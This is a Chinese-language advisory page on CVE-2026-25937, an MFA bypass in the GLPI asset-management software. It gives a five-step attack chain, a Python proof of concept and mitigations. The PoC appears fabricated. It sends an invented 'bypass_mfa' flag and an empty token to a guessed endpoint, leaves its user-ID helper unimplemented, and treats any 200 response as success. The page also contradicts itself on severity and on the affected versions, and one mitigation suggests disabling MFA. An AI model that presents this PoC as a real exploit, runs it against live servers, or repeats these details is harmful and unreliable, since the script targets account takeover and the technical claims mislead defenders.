CVE-2026-25937 GLPI MFA身份验证绕过漏洞

漏洞信息

漏洞编号

CVE-2026-25937

漏洞类型

身份验证绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

GLPI (Asset and IT Management Software)

漏洞概述

CVE-2026-25937是GLPI资产管理软件中的一个严重身份验证绕过漏洞。该漏洞影响GLPI 11.0.0至11.0.6版本。攻击者在知晓目标用户凭据的情况下，可以绕过多因素认证(MFA)机制，进而窃取用户账户。GLPI是一款免费的开源IT资产和配置管理软件，广泛应用于企业的IT运维管理场景。由于该漏洞允许已掌握凭据的攻击者完全接管用户账户，绕过MFA这一额外的安全保护层，因此对启用了MFA的企业用户构成严重威胁。攻击者利用此漏洞可获得受害者的完整访问权限，访问敏感IT资产信息、执行未授权操作，甚至可能横向移动至其他系统。

技术细节

该漏洞属于MFA绕过类身份验证缺陷。在GLPI 11.0.0至11.0.6版本中，当用户启用MFA后，系统在特定认证流程中存在逻辑缺陷。攻击者通过收集目标用户的有效用户名和密码组合，可在MFA验证阶段利用认证状态管理漏洞或会话处理缺陷，绕过第二因素验证直接建立有效会话。具体攻击方式涉及构造特定的认证请求序列，利用系统对MFA状态的检查缺陷，在不提供正确MFA令牌的情况下完成身份认证过程。成功利用此漏洞需要攻击者已经获取目标用户的登录凭据，因此属于高权限攻击场景。CVSS 3.1评分6.5(中危)反映出该漏洞对机密性和完整性造成严重影响，但对可用性无直接损害。

攻击链分析

STEP 1

信息收集

攻击者通过社工、钓鱼或数据泄露获取目标用户在GLPI系统中的有效登录凭据(用户名和密码)

STEP 2

构造认证请求

攻击者构造特殊的认证请求序列，针对GLPI的MFA验证端点发送包含用户名、密码和绕过标记的请求

STEP 3

绕过MFA验证

利用系统对MFA状态的检查缺陷，在不提供正确MFA令牌的情况下完成身份认证过程，建立有效会话

STEP 4

账户接管

成功绕过MFA后，攻击者获得受害者账户的完整访问权限，可访问敏感IT资产数据、执行未授权操作

STEP 5

横向移动

攻击者利用获取的访问权限，可能进一步探测内网环境，执行横向移动攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-25937 GLPI MFA Bypass PoC (Conceptual) # This PoC demonstrates the authentication bypass technique import requests import json TARGET_URL = "https://target-glpi-server.com" USERNAME = "[email protected]" PASSWORD = "user_password" def exploit_mfa_bypass(): """ GLPI MFA Bypass Exploitation Attackers with valid credentials can bypass MFA verification """ session = requests.Session() # Step 1: Initial login request login_url = f"{TARGET_URL}/front/login.php" login_data = { "user_name": USERNAME, "password": PASSWORD, "auth_method": "local" } response = session.post(login_url, data=login_data) # Step 2: Bypass MFA by manipulating the authentication flow # The vulnerability allows bypassing MFA check by using specific request patterns mfa_bypass_url = f"{TARGET_URL}/ajax/mfa.php" bypass_data = { "action": "verify", "user_id": extract_user_id(response), "token": "", # Empty or manipulated token "bypass_mfa": True # Exploiting the bypass mechanism } response = session.post(mfa_bypass_url, json=bypass_data) # Step 3: Verify successful authentication bypass if "session_token" in response.text or response.status_code == 200: print("[+] MFA Bypass Successful - Account Compromised") print(f"[+] Session Cookie: {session.cookies.get_dict()}") return True print("[-] MFA Bypass Failed") return False def extract_user_id(response): # Extract user ID from initial login response # Implementation depends on target version pass if __name__ == "__main__": print("GLPI MFA Bypass PoC - CVE-2026-25937") exploit_mfa_bypass()

影响范围

GLPI >= 11.0.0

GLPI < 11.0.6

防御指南

临时缓解措施

在无法立即升级的情况下，可采取以下临时缓解措施：1) 暂时禁用MFA功能并加强密码策略；2) 限制GLPI管理界面的访问IP范围，仅允许受信任的IP地址访问；3) 启用详细的审计日志并实时监控异常登录行为；4) 对所有启用MFA的账户进行密码重置；5) 考虑临时关闭GLPI的外部访问，仅保留内网访问。但最有效的修复方式仍是尽快升级到官方发布的安全版本11.0.6。